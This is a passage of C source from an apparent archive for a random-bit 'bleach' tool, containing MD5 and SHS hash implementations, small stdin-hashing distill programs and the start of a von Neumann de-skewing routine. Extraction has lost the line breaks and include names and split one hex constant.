#define F(x, y, z) (((x) & (y)) | ((~x) & (z)))
#define G(x, y, z) (((x) & (z)) | ((y) & (~z)))
#define H(x, y, z) ((x) ^ (y) ^ (z))
#define I(x, y, z) ((y) ^ ((x) | (~z)))

/* ROTATE_LEFT rotates x left n bits */
#define ROTATE_LEFT(x, n) (((x) << (n)) | ((x) >> (32-(n))))

/* FF, GG, HH, and II transformations for rounds 1, 2, 3, and 4 */
/* Rotation is separate from addition to prevent recomputation */
#define FF(a, b, c, d, x, s, ac) \
  {(a) += F ((b), (c), (d)) + (x) + (UINT4)(ac); \
   (a) = ROTATE_LEFT ((a), (s)); \
   (a) += (b); \
  }
#define GG(a, b, c, d, x, s, ac) \
  {(a) += G ((b), (c), (d)) + (x) + (UINT4)(ac); \
   (a) = ROTATE_LEFT ((a), (s)); \
   (a) += (b); \
  }
#define HH(a, b, c, d, x, s, ac) \
  {(a) += H ((b), (c), (d)) + (x) + (UINT4)(ac); \
   (a) = ROTATE_LEFT ((a), (s)); \
   (a) += (b); \
  }
#define II(a, b, c, d, x, s, ac) \
  {(a) += I ((b), (c), (d)) + (x) + (UINT4)(ac); \
   (a) = ROTATE_LEFT ((a), (s)); \
   (a) += (b); \
  }

/* The routine MD5Init initializes the message-digest context
   mdContext. All fields are set to zero.
 */
void MD5Init (mdContext)
MD5_CTX *mdContext;
{
  mdContext->i[0] = mdContext->i[1] = (UINT4)0;

  /* Load magic initialization constants.
   */
  mdContext->buf[0] = (UINT4)0x67452301;
  mdContext->buf[1] = (UINT4)0xefcdab89;
  mdContext->buf[2] = (UINT4)0x98badcfe;
  mdContext->buf[3] = (UINT4)0x10325476;
}

/* The routine MD5Update updates the message-digest context to
   account for the presence of each of the characters inBuf[0..inLen-1]
   in the message whose digest is being computed.
 */
void MD5Update (mdContext, inBuf, inLen)
MD5_CTX *mdContext;
unsigned char *inBuf;
unsigned int inLen;
{
  UINT4 in[16];
  int mdi;
  unsigned int i, ii;

  /* compute number of bytes mod 64 */
  mdi = (int)((mdContext->i[0] >> 3) & 0x3F);

  /* update number of bits */
  if ((mdContext->i[0] + ((UINT4)inLen << 3)) < mdContext->i[0])
    mdContext->i[1]++;
  mdContext->i[0] += ((UINT4)inLen << 3);
  mdContext->i[1] += ((UINT4)inLen >> 29);

  while (inLen--) {
    /* add new character to buffer, increment mdi */
    mdContext->in[mdi++] = *inBuf++;

    /* transform if necessary */
    if (mdi == 0x40) {
      for (i = 0, ii = 0; i < 16; i++, ii += 4)
        in[i] = (((UINT4)mdContext->in[ii+3]) << 24) |
                (((UINT4)mdContext->in[ii+2]) << 16) |
                (((UINT4)mdContext->in[ii+1]) << 8) |
                ((UINT4)mdContext->in[ii]);
      Transform (mdContext->buf, in);
      mdi = 0;
    }
  }
}

/* The routine MD5Final terminates the message-digest computation and
   ends with the desired message digest in mdContext->digest[0...15].
*/ void MD5Final (mdContext) MD5_CTX *mdContext; { UINT4 in[16]; int mdi; unsigned int i, ii; unsigned int padLen; /* save number of bits */ in[14] = mdContext->i[0]; in[15] = mdContext->i[1]; /* compute number of bytes mod 64 */ mdi = (int)((mdContext->i[0] >> 3) & 0x3F); /* pad out to 56 mod 64 */ padLen = (mdi < 56) ? (56 - mdi) : (120 - mdi); MD5Update (mdContext, PADDING, padLen); /* append length in bits and transform */ for (i = 0, ii = 0; i < 14; i++, ii += 4) in[i] = (((UINT4)mdContext->in[ii+3]) << 24) | (((UINT4)mdContext->in[ii+2]) << 16) | (((UINT4)mdContext->in[ii+1]) << 8) | ((UINT4)mdContext->in[ii]); Transform (mdContext->buf, in); /* store buffer in digest */ for (i = 0, ii = 0; i < 4; i++, ii += 4) { mdContext->digest[ii] = (unsigned char)(mdContext->buf[i] & 0xFF); mdContext->digest[ii+1] = (unsigned char)((mdContext->buf[i] >> 8) & 0xFF); mdContext->digest[ii+2] = (unsigned char)((mdContext->buf[i] >> 16) & 0xFF); mdContext->digest[ii+3] = (unsigned char)((mdContext->buf[i] >> 24) & 0xFF); } } /* Basic MD5 step. Transforms buf based on in. 
*/ static void Transform (buf, in) UINT4 *buf; UINT4 *in; { UINT4 a = buf[0], b = buf[1], c = buf[2], d = buf[3]; /* Round 1 */ #define S11 7 #define S12 12 #define S13 17 #define S14 22 FF ( a, b, c, d, in[ 0], S11, 3614090360); /* 1 */ FF ( d, a, b, c, in[ 1], S12, 3905402710); /* 2 */ FF ( c, d, a, b, in[ 2], S13, 606105819); /* 3 */ FF ( b, c, d, a, in[ 3], S14, 3250441966); /* 4 */ FF ( a, b, c, d, in[ 4], S11, 4118548399); /* 5 */ FF ( d, a, b, c, in[ 5], S12, 1200080426); /* 6 */ FF ( c, d, a, b, in[ 6], S13, 2821735955); /* 7 */ FF ( b, c, d, a, in[ 7], S14, 4249261313); /* 8 */ FF ( a, b, c, d, in[ 8], S11, 1770035416); /* 9 */ FF ( d, a, b, c, in[ 9], S12, 2336552879); /* 10 */ FF ( c, d, a, b, in[10], S13, 4294925233); /* 11 */ FF ( b, c, d, a, in[11], S14, 2304563134); /* 12 */ FF ( a, b, c, d, in[12], S11, 1804603682); /* 13 */ FF ( d, a, b, c, in[13], S12, 4254626195); /* 14 */ FF ( c, d, a, b, in[14], S13, 2792965006); /* 15 */ FF ( b, c, d, a, in[15], S14, 1236535329); /* 16 */ /* Round 2 */ #define S21 5 #define S22 9 #define S23 14 #define S24 20 GG ( a, b, c, d, in[ 1], S21, 4129170786); /* 17 */ GG ( d, a, b, c, in[ 6], S22, 3225465664); /* 18 */ GG ( c, d, a, b, in[11], S23, 643717713); /* 19 */ GG ( b, c, d, a, in[ 0], S24, 3921069994); /* 20 */ GG ( a, b, c, d, in[ 5], S21, 3593408605); /* 21 */ GG ( d, a, b, c, in[10], S22, 38016083); /* 22 */ GG ( c, d, a, b, in[15], S23, 3634488961); /* 23 */ GG ( b, c, d, a, in[ 4], S24, 3889429448); /* 24 */ GG ( a, b, c, d, in[ 9], S21, 568446438); /* 25 */ GG ( d, a, b, c, in[14], S22, 3275163606); /* 26 */ GG ( c, d, a, b, in[ 3], S23, 4107603335); /* 27 */ GG ( b, c, d, a, in[ 8], S24, 1163531501); /* 28 */ GG ( a, b, c, d, in[13], S21, 2850285829); /* 29 */ GG ( d, a, b, c, in[ 2], S22, 4243563512); /* 30 */ GG ( c, d, a, b, in[ 7], S23, 1735328473); /* 31 */ GG ( b, c, d, a, in[12], S24, 2368359562); /* 32 */ /* Round 3 */ #define S31 4 #define S32 11 #define S33 16 #define S34 23 HH ( a, b, c, d, 
in[ 5], S31, 4294588738); /* 33 */ HH ( d, a, b, c, in[ 8], S32, 2272392833); /* 34 */ HH ( c, d, a, b, in[11], S33, 1839030562); /* 35 */ HH ( b, c, d, a, in[14], S34, 4259657740); /* 36 */ HH ( a, b, c, d, in[ 1], S31, 2763975236); /* 37 */ HH ( d, a, b, c, in[ 4], S32, 1272893353); /* 38 */ HH ( c, d, a, b, in[ 7], S33, 4139469664); /* 39 */ HH ( b, c, d, a, in[10], S34, 3200236656); /* 40 */ HH ( a, b, c, d, in[13], S31, 681279174); /* 41 */ HH ( d, a, b, c, in[ 0], S32, 3936430074); /* 42 */ HH ( c, d, a, b, in[ 3], S33, 3572445317); /* 43 */ HH ( b, c, d, a, in[ 6], S34, 76029189); /* 44 */ HH ( a, b, c, d, in[ 9], S31, 3654602809); /* 45 */ HH ( d, a, b, c, in[12], S32, 3873151461); /* 46 */ HH ( c, d, a, b, in[15], S33, 530742520); /* 47 */ HH ( b, c, d, a, in[ 2], S34, 3299628645); /* 48 */ /* Round 4 */ #define S41 6 #define S42 10 #define S43 15 #define S44 21 II ( a, b, c, d, in[ 0], S41, 4096336452); /* 49 */ II ( d, a, b, c, in[ 7], S42, 1126891415); /* 50 */ II ( c, d, a, b, in[14], S43, 2878612391); /* 51 */ II ( b, c, d, a, in[ 5], S44, 4237533241); /* 52 */ II ( a, b, c, d, in[12], S41, 1700485571); /* 53 */ II ( d, a, b, c, in[ 3], S42, 2399980690); /* 54 */ II ( c, d, a, b, in[10], S43, 4293915773); /* 55 */ II ( b, c, d, a, in[ 1], S44, 2240044497); /* 56 */ II ( a, b, c, d, in[ 8], S41, 1873313359); /* 57 */ II ( d, a, b, c, in[15], S42, 4264355552); /* 58 */ II ( c, d, a, b, in[ 6], S43, 2734768916); /* 59 */ II ( b, c, d, a, in[13], S44, 1309151649); /* 60 */ II ( a, b, c, d, in[ 4], S41, 4149444226); /* 61 */ II ( d, a, b, c, in[11], S42, 3174756917); /* 62 */ II ( c, d, a, b, in[ 2], S43, 718787259); /* 63 */ II ( b, c, d, a, in[ 9], S44, 3951481745); /* 64 */ buf[0] += a; buf[1] += b; buf[2] += c; buf[3] += d; } /* *********************************************************************** ** End of md5.c ** ******************************** (cut) ******************************** */ <--> <++> bleach/md5/md5c.h /* 
*********************************************************************** ** md5.h -- header file for implementation of MD5 ** ** RSA Data Security, Inc. MD5 Message-Digest Algorithm ** ** Created: 2/17/90 RLR ** ** Revised: 12/27/90 SRD,AJ,BSK,JT Reference C version ** ** Revised (for MD5): RLR 4/27/91 ** ** -- G modified to have y&~z instead of y&z ** ** -- FF, GG, HH modified to add in last register done ** ** -- Access pattern: round 2 works mod 5, round 3 works mod 3 ** ** -- distinct additive constant for each step ** ** -- round 4 added, working mod 7 ** *********************************************************************** */ /* *********************************************************************** ** Copyright (C) 1990, RSA Data Security, Inc. All rights reserved. ** ** ** ** License to copy and use this software is granted provided that ** ** it is identified as the "RSA Data Security, Inc. MD5 Message- ** ** Digest Algorithm" in all material mentioning or referencing this ** ** software or this function. ** ** ** ** License is also granted to make and use derivative works ** ** provided that such works are identified as "derived from the RSA ** ** Data Security, Inc. MD5 Message-Digest Algorithm" in all ** ** material mentioning or referencing the derived work. ** ** ** ** RSA Data Security, Inc. makes no representations concerning ** ** either the merchantability of this software or the suitability ** ** of this software for any particular purpose. It is provided "as ** ** is" without express or implied warranty of any kind. ** ** ** ** These notices must be retained in any copies of any part of this ** ** documentation and/or software. 
** *********************************************************************** */ /* typedef a 32-bit type */ typedef unsigned long int UINT4; /* Data structure for MD5 (Message-Digest) computation */ typedef struct { UINT4 i[2]; /* number of _bits_ handled mod 2^64 */ UINT4 buf[4]; /* scratch buffer */ unsigned char in[64]; /* input buffer */ unsigned char digest[16]; /* actual digest after MD5Final call */ } MD5_CTX; void MD5Init (); void MD5Update (); void MD5Final (); /* *********************************************************************** ** End of md5.h ** ******************************** (cut) ******************************** */ <--> <++> bleach/md5_distill.c #include #include "md5/md5.h" main () { MD5_CTX md5Info; unsigned char c[16]; while (fread(c, 1,16,stdin) == 16) { MD5Init(&md5Info); MD5Update(&md5Info,c,16); MD5Final(&md5Info); fwrite(md5Info.digest,1,16,stdout); } } <--> <++> bleach/sha/shs.c /* --------------------------------- SHS.C ------------------------------- */ /* * NIST proposed Secure Hash Standard. * * Written 2 September 1992, Peter C. Gutmann. * This implementation placed in the public domain. 
* * Comments to pgut1@cs.aukuni.ac.nz */ #include #include "shs.h" /* The SHS f()-functions */ #define f1(x,y,z) ( ( x & y ) | ( ~x & z ) ) /* Rounds 0-19 */ #define f2(x,y,z) ( x ^ y ^ z ) /* Rounds 20-39 */ #define f3(x,y,z) ( ( x & y ) | ( x & z ) | ( y & z ) ) /* Rounds 40-59 */ #define f4(x,y,z) ( x ^ y ^ z ) /* Rounds 60-79 */ /* The SHS Mysterious Constants */ #define K1 0x5A827999L /* Rounds 0-19 */ #define K2 0x6ED9EBA1L /* Rounds 20-39 */ #define K3 0x8F1BBCDCL /* Rounds 40-59 */ #define K4 0xCA62C1D6L /* Rounds 60-79 */ /* SHS initial values */ #define h0init 0x67452301L #define h1init 0xEFCDAB89L #define h2init 0x98BADCFEL #define h3init 0x10325476L #define h4init 0xC3D2E1F0L /* 32-bit rotate - kludged with shifts */ #define S(n,X) ((X << n) | (X >> (32 - n))) /* The initial expanding function */ #define expand(count) W [count] = W [count - 3] ^ W [count - 8] ^ W [count - 14] ^ W [count - 16] /* The four SHS sub-rounds */ #define subRound1(count) \ { \ temp = S (5, A) + f1 (B, C, D) + E + W [count] + K1; \ E = D; \ D = C; \ C = S (30, B); \ B = A; \ A = temp; \ } #define subRound2(count) \ { \ temp = S (5, A) + f2 (B, C, D) + E + W [count] + K2; \ E = D; \ D = C; \ C = S (30, B); \ B = A; \ A = temp; \ } #define subRound3(count) \ { \ temp = S (5, A) + f3 (B, C, D) + E + W [count] + K3; \ E = D; \ D = C; \ C = S (30, B); \ B = A; \ A = temp; \ } #define subRound4(count) \ { \ temp = S (5, A) + f4 (B, C, D) + E + W [count] + K4; \ E = D; \ D = C; \ C = S (30, B); \ B = A; \ A = temp; \ } /* The two buffers of 5 32-bit words */ LONG h0, h1, h2, h3, h4; LONG A, B, C, D, E; local void byteReverse OF((LONG *buffer, int byteCount)); void shsTransform OF((SHS_INFO *shsInfo)); /* Initialize the SHS values */ void shsInit (shsInfo) SHS_INFO *shsInfo; { /* Set the h-vars to their initial values */ shsInfo->digest [0] = h0init; shsInfo->digest [1] = h1init; shsInfo->digest [2] = h2init; shsInfo->digest [3] = h3init; shsInfo->digest [4] = h4init; /* Initialise bit 
count */ shsInfo->countLo = shsInfo->countHi = 0L; } /* * Perform the SHS transformation. Note that this code, like MD5, seems to * break some optimizing compilers - it may be necessary to split it into * sections, eg based on the four subrounds */ void shsTransform (shsInfo) SHS_INFO *shsInfo; { LONG W [80], temp; int i; /* Step A. Copy the data buffer into the local work buffer */ for (i = 0; i < 16; i++) W [i] = shsInfo->data [i]; /* Step B. Expand the 16 words into 64 temporary data words */ expand (16); expand (17); expand (18); expand (19); expand (20); expand (21); expand (22); expand (23); expand (24); expand (25); expand (26); expand (27); expand (28); expand (29); expand (30); expand (31); expand (32); expand (33); expand (34); expand (35); expand (36); expand (37); expand (38); expand (39); expand (40); expand (41); expand (42); expand (43); expand (44); expand (45); expand (46); expand (47); expand (48); expand (49); expand (50); expand (51); expand (52); expand (53); expand (54); expand (55); expand (56); expand (57); expand (58); expand (59); expand (60); expand (61); expand (62); expand (63); expand (64); expand (65); expand (66); expand (67); expand (68); expand (69); expand (70); expand (71); expand (72); expand (73); expand (74); expand (75); expand (76); expand (77); expand (78); expand (79); /* Step C. Set up first buffer */ A = shsInfo->digest [0]; B = shsInfo->digest [1]; C = shsInfo->digest [2]; D = shsInfo->digest [3]; E = shsInfo->digest [4]; /* Step D. 
Serious mangling, divided into four sub-rounds */ subRound1 (0); subRound1 (1); subRound1 (2); subRound1 (3); subRound1 (4); subRound1 (5); subRound1 (6); subRound1 (7); subRound1 (8); subRound1 (9); subRound1 (10); subRound1 (11); subRound1 (12); subRound1 (13); subRound1 (14); subRound1 (15); subRound1 (16); subRound1 (17); subRound1 (18); subRound1 (19); subRound2 (20); subRound2 (21); subRound2 (22); subRound2 (23); subRound2 (24); subRound2 (25); subRound2 (26); subRound2 (27); subRound2 (28); subRound2 (29); subRound2 (30); subRound2 (31); subRound2 (32); subRound2 (33); subRound2 (34); subRound2 (35); subRound2 (36); subRound2 (37); subRound2 (38); subRound2 (39); subRound3 (40); subRound3 (41); subRound3 (42); subRound3 (43); subRound3 (44); subRound3 (45); subRound3 (46); subRound3 (47); subRound3 (48); subRound3 (49); subRound3 (50); subRound3 (51); subRound3 (52); subRound3 (53); subRound3 (54); subRound3 (55); subRound3 (56); subRound3 (57); subRound3 (58); subRound3 (59); subRound4 (60); subRound4 (61); subRound4 (62); subRound4 (63); subRound4 (64); subRound4 (65); subRound4 (66); subRound4 (67); subRound4 (68); subRound4 (69); subRound4 (70); subRound4 (71); subRound4 (72); subRound4 (73); subRound4 (74); subRound4 (75); subRound4 (76); subRound4 (77); subRound4 (78); subRound4 (79); /* Step E. Build message digest */ shsInfo->digest [0] += A; shsInfo->digest [1] += B; shsInfo->digest [2] += C; shsInfo->digest [3] += D; shsInfo->digest [4] += E; } local void byteReverse (buffer, byteCount) LONG *buffer; int byteCount; { LONG value; int count; /* * Find out what the byte order is on this machine. * Big endian is for machines that place the most significant byte * first (eg. Sun SPARC). Little endian is for machines that place * the least significant byte first (eg. VAX). * * We figure out the byte order by stuffing a 2 byte string into a * short and examining the left byte. 
'@' = 0x40 and 'P' = 0x50 * If the left byte is the 'high' byte, then it is 'big endian'. * If the left byte is the 'low' byte, then the machine is 'little * endian'. * * -- Shawn A. Clifford (sac@eng.ufl.edu) */ /* * Several bugs fixed -- Pat Myrto (pat@rwing.uucp) */ if ((*(unsigned short *) ("@P") >> 8) == '@') return; byteCount /= sizeof (LONG); for (count = 0; count < byteCount; count++) { value = (buffer [count] << 16) | (buffer [count] >> 16); buffer [count] = ((value & 0xFF00FF00L) >> 8) | ((value & 0x00F F00FFL) << 8); } } /* * Update SHS for a block of data. This code assumes that the buffer size is * a multiple of SHS_BLOCKSIZE bytes long, which makes the code a lot more * efficient since it does away with the need to handle partial blocks * between calls to shsUpdate() */ void shsUpdate (shsInfo, buffer, count) SHS_INFO *shsInfo; BYTE *buffer; int count; { /* Update bitcount */ if ((shsInfo->countLo + ((LONG) count << 3)) < shsInfo->countLo) shsInfo->countHi++; /* Carry from low to high bitCount */ shsInfo->countLo += ((LONG) count << 3); shsInfo->countHi += ((LONG) count >> 29); /* Process data in SHS_BLOCKSIZE chunks */ while (count >= SHS_BLOCKSIZE) { memcpy (shsInfo->data, buffer, SHS_BLOCKSIZE); byteReverse (shsInfo->data, SHS_BLOCKSIZE); shsTransform (shsInfo); buffer += SHS_BLOCKSIZE; count -= SHS_BLOCKSIZE; } /* * Handle any remaining bytes of data. * This should only happen once on the final lot of data */ memcpy (shsInfo->data, buffer, count); } void shsFinal (shsInfo) SHS_INFO *shsInfo; { int count; LONG lowBitcount = shsInfo->countLo, highBitcount = shsInfo->countHi; /* Compute number of bytes mod 64 */ count = (int) ((shsInfo->countLo >> 3) & 0x3F); /* * Set the first char of padding to 0x80. 
* This is safe since there is always at least one byte free */ ((BYTE *) shsInfo->data) [count++] = 0x80; /* Pad out to 56 mod 64 */ if (count > 56) { /* Two lots of padding: Pad the first block to 64 bytes */ memset ((BYTE *) shsInfo->data + count, 0, 64 - count); byteReverse (shsInfo->data, SHS_BLOCKSIZE); shsTransform (shsInfo); /* Now fill the next block with 56 bytes */ memset (shsInfo->data, 0, 56); } else /* Pad block to 56 bytes */ memset ((BYTE *) shsInfo->data + count, 0, 56 - count); byteReverse (shsInfo->data, SHS_BLOCKSIZE); /* Append length in bits and transform */ shsInfo->data [14] = highBitcount; shsInfo->data [15] = lowBitcount; shsTransform (shsInfo); byteReverse (shsInfo->data, SHS_DIGESTSIZE); } <--> <++> bleach/sha/shs.h /* --------------------------------- SHS.H ------------------------------- */ /* * NIST proposed Secure Hash Standard. * * Written 2 September 1992, Peter C. Gutmann. * This implementation placed in the public domain. * * Comments to pgut1@cs.aukuni.ac.nz */ /* Useful defines/typedefs */ #ifndef SHS_H #define SHS_H typedef unsigned char BYTE; typedef unsigned long LONG; /* The SHS block size and message digest sizes, in bytes */ #define SHS_BLOCKSIZE 64 #define SHS_DIGESTSIZE 20 /* The structure for storing SHS info */ typedef struct { LONG digest [5]; /* Message digest */ LONG countLo, countHi; /* 64-bit bit count */ LONG data [16]; /* SHS data buffer */ } SHS_INFO; /* Turn off prototypes if requested */ #if (defined(NOPROTO) && defined(PROTO)) # undef PROTO #endif /* Used to remove arguments in function prototypes for non-ANSI C */ #ifdef PROTO # define OF(a) a #else /* !PROTO */ # define OF(a) () #endif /* ?PROTO */ #define local static void shsInit OF((SHS_INFO *shsInfo)); void shsUpdate OF((SHS_INFO *shsInfo, BYTE *buffer, int count)); void shsFinal OF((SHS_INFO *shsInfo)); #endif <--> <++> bleach/sha_distill.c #include #include "sha/shs.h" main () { SHS_INFO shsInfo; unsigned char c[20]; while (fread(c, 1,20,stdin) == 
20) { shsInit(&shsInfo); shsUpdate(&shsInfo,c,20); shsFinal(&shsInfo); fwrite(&shsInfo,1,20,stdout); } } <--> <++> bleach/transmap.c /* Implementation of von Neumann's transistion mapping scheme to de-skew a series of random bits. See 5.2.2 of RFC1750 for more information. */ #include char reconstruct_byte(char *byte_ary); main () { char c, b1, b2, i, j; char byte[7]; j=0; while ( !feof(stdin) ) { fread(&c, 1,1,stdin); for (i=7; i>=0; i-=2) { b1=((c>>i)&1); /* integer representation of bit i */ b2=((c>>(i-1))&1); if ( (b1==1) && (b2==0) ) /* translation of 10 */ { byte[j]=1; j++; } if ( (b1==0) && (b2==1) ) /* translation of 01 */ { byte[j]=0; j++;